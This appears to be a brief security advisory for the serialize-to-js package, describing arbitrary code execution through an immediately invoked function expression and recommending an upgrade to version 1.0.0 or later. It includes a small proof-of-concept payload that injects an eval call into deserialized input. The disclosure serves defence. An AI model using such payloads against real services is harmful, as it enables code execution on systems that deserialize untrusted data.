Affected versions of serialize-to-js may be vulnerable to arbitrary code execution through an Immediately Invoked Function Expression (IIFE).
Proof of Concept js var payload = "{e: (function(){ eval('console.log(exploited)') })() }" var serialize = require('serialize-to-js'); serialize.deserialize(payload);
Recommendation
Update to version 1.0.0, or later, and review this disclaimer from the author.